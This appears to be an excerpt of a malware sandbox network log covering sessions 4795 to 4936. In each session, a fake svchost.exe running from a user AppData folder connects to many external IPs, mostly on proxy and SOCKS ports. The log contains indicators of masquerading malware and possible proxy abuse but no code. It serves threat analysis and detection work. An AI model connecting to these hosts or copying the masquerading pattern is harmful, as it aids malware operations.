4795	192.168.2.5	64923	46.35.9.110	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4796	192.168.2.5	64934	23.137.248.197	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4797	192.168.2.5	65040	192.252.220.89	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4798	192.168.2.5	64931	45.138.87.238	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4799	192.168.2.5	64921	13.229.47.109	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4800	192.168.2.5	64924	202.162.219.10	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4801	192.168.2.5	64911	65.1.244.232	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4802	192.168.2.5	65111	164.92.86.113	50564	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4803	192.168.2.5	64932	203.171.19.98	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4804	192.168.2.5	65137	104.16.106.234	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4805	192.168.2.5	65074	3.12.144.146	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4806	192.168.2.5	65017	18.134.236.231	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4807	192.168.2.5	65198	104.23.126.8	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4808	192.168.2.5	65203	104.17.37.235	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4809	192.168.2.5	65020	95.164.89.123	8888	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4810	192.168.2.5	64936	103.146.137.5	1081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4811	192.168.2.5	65220	162.159.241.160	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4812	192.168.2.5	65044	198.105.111.15	6693	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4813	192.168.2.5	65329	45.144.30.205	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4814	192.168.2.5	65333	45.144.30.205	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4815	192.168.2.5	65334	45.144.30.205	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4816	192.168.2.5	65045	46.17.63.166	9091	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4817	192.168.2.5	65069	184.185.2.12	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4818	192.168.2.5	65335	45.144.30.205	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4819	192.168.2.5	65030	195.90.216.75	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4820	192.168.2.5	65084	54.248.238.110	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4821	192.168.2.5	65059	121.164.200.18	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4822	192.168.2.5	65003	111.90.150.109	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4823	192.168.2.5	65014	62.171.131.101	37447	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4824	192.168.2.5	65043	34.95.243.122	8081	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4825	192.168.2.5	65006	38.54.16.97	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4826	192.168.2.5	65027	47.96.145.14	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4827	192.168.2.5	65347	31.7.65.18	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4828	192.168.2.5	65245	104.16.109.143	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4829	192.168.2.5	65012	171.250.222.13	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4830	192.168.2.5	65348	31.7.65.18	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4831	192.168.2.5	65352	31.7.65.18	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4832	192.168.2.5	65355	31.7.65.18	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4833	192.168.2.5	65096	51.15.247.93	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4834	192.168.2.5	63782	92.204.134.38	30747	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4835	192.168.2.5	65102	43.131.248.165	15673	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4836	192.168.2.5	65112	188.166.17.18	8881	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4837	192.168.2.5	65259	45.12.30.231	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4838	192.168.2.5	65263	104.24.193.186	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4839	192.168.2.5	65131	18.135.211.182	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4840	192.168.2.5	65095	45.11.95.166	6002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4841	192.168.2.5	65090	154.239.3.185	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4842	192.168.2.5	65119	43.131.246.77	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4843	192.168.2.5	65272	192.154.244.92	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4844	192.168.2.5	65179	130.162.213.175	3129	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4845	192.168.2.5	65222	20.111.54.16	8123	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4846	192.168.2.5	65213	119.28.4.112	9999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4847	192.168.2.5	65176	194.182.178.90	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4848	192.168.2.5	63808	192.169.226.96	29618	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4849	192.168.2.5	65292	104.18.81.76	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4850	192.168.2.5	65257	38.162.8.232	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4851	192.168.2.5	65301	104.17.50.45	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4852	192.168.2.5	65275	192.163.200.93	39095	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4853	192.168.2.5	65184	94.177.106.178	2324	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4854	192.168.2.5	65180	115.239.234.43	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4855	192.168.2.5	65215	94.30.152.172	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4856	192.168.2.5	65170	202.139.198.15	3030	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4857	192.168.2.5	65177	138.36.150.16	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4858	192.168.2.5	65310	162.159.242.62	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4859	192.168.2.5	65173	222.255.238.159	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4860	192.168.2.5	65207	182.106.220.252	9091	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4861	192.168.2.5	65230	120.79.101.0	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4862	192.168.2.5	64900	146.190.85.79	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4863	192.168.2.5	65219	203.19.38.114	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4864	192.168.2.5	65284	129.213.150.205	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4865	192.168.2.5	65229	60.190.68.154	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4866	192.168.2.5	65315	162.241.53.72	62192	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4867	192.168.2.5	65369	104.20.198.49	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4868	192.168.2.5	65236	103.49.114.195	8080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4869	192.168.2.5	65026	117.160.250.163	8828	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4870	192.168.2.5	65384	65.49.38.202	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4871	192.168.2.5	65267	43.155.130.182	15673	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4872	192.168.2.5	65325	46.51.249.135	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4873	192.168.2.5	65331	35.79.120.242	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4874	192.168.2.5	65276	163.15.183.33	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4875	192.168.2.5	65088	5.10.249.159	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4876	192.168.2.5	65251	183.230.162.122	9091	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4877	192.168.2.5	65408	104.25.58.39	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4878	192.168.2.5	65409	185.238.228.96	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4879	192.168.2.5	65432	104.21.31.189	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4880	192.168.2.5	65302	213.136.75.85	50238	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4881	192.168.2.5	65455	172.67.181.32	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4882	192.168.2.5	63825	194.226.164.214	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4883	192.168.2.5	65336	221.153.92.39	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4884	192.168.2.5	65419	162.241.46.40	46097	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4885	192.168.2.5	65445	34.49.208.221	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4886	192.168.2.5	65397	68.183.143.134	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4887	192.168.2.5	63857	72.210.208.101	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4888	192.168.2.5	65337	80.67.8.6	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4889	192.168.2.5	63964	162.241.50.179	31414	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4890	192.168.2.5	65367	5.135.137.13	59124	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4891	192.168.2.5	65360	58.234.116.197	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4892	192.168.2.5	65411	192.111.137.35	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4893	192.168.2.5	65399	95.164.207.157	58378	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4894	192.168.2.5	65492	172.67.181.97	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4895	192.168.2.5	65506	104.16.105.106	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4896	192.168.2.5	65321	171.244.140.160	34559	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4897	192.168.2.5	63830	34.93.157.87	21802	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4898	192.168.2.5	49163	172.67.140.87	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4899	192.168.2.5	49165	172.67.140.87	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4900	192.168.2.5	65371	120.76.42.209	8888	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4901	192.168.2.5	65460	162.223.94.166	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4902	192.168.2.5	65479	67.201.59.70	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4903	192.168.2.5	65500	198.99.81.197	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4904	192.168.2.5	65393	198.105.101.129	5758	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4905	192.168.2.5	65387	27.96.235.171	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4906	192.168.2.5	65406	18.169.83.87	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4907	192.168.2.5	65350	52.172.1.186	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4908	192.168.2.5	65400	34.92.12.210	9238	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4909	192.168.2.5	65386	185.158.114.14	25697	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4910	192.168.2.5	65523	192.154.244.92	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4911	192.168.2.5	65389	120.78.191.68	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4912	192.168.2.5	65454	18.135.133.116	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4913	192.168.2.5	65526	104.238.111.107	8968	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4914	192.168.2.5	65422	14.103.24.20	8000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4915	192.168.2.5	65476	23.137.248.197	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4916	192.168.2.5	65241	117.160.250.163	82	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4917	192.168.2.5	65426	221.6.139.190	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4918	192.168.2.5	64739	210.72.11.46	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4919	192.168.2.5	63916	94.247.244.120	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4920	192.168.2.5	49152	172.67.182.96	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4921	192.168.2.5	65256	117.160.250.130	8899	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4922	192.168.2.5	65448	43.255.113.232	8081	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4923	192.168.2.5	65522	184.185.2.12	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4924	192.168.2.5	49169	104.19.85.214	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4925	192.168.2.5	65477	119.3.215.41	8888	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4926	192.168.2.5	64773	117.54.114.98	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4927	192.168.2.5	65266	36.134.91.82	8888	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4928	192.168.2.5	65403	176.99.2.43	1081	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4929	192.168.2.5	65124	123.56.1.50	3129	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4930	192.168.2.5	65486	102.223.20.217	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4931	192.168.2.5	65399	95.164.207.157	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4932	192.168.2.5	65520	45.138.87.238	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4933	192.168.2.5	64044	198.12.255.193	32216	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4934	192.168.2.5	62768	134.122.26.11	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4935	192.168.2.5	65442	102.132.201.202	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4936	192.168.2.5	65489	103.163.51.254	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

